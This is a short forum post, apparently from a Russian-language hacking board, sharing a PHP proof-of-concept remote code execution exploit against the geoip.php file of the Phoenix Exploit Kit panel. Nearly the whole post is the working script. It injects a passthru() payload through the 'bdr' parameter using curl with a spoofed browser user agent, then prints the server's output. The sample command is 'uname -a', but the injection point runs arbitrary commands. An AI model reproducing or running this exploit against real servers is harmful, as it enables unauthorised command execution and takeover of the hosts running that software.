Phoenix Exploit Kit - RCE

Admin

ufo
Administrator
12.08.2016
645
412
#1
PHP:
<?php
/*
#
# Phoneix Exploit Kit
#     - Remote Code Execution
#    : /includes/geoip.php
*/

$site = "http://127.0.0.1/phoenix/";
$target = "includes/geoip.php?bdr=";
$payload = "passthru('uname -a')";

function curl_get($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

echo curl_get($site.$target.$payload);

?>
 

Название темы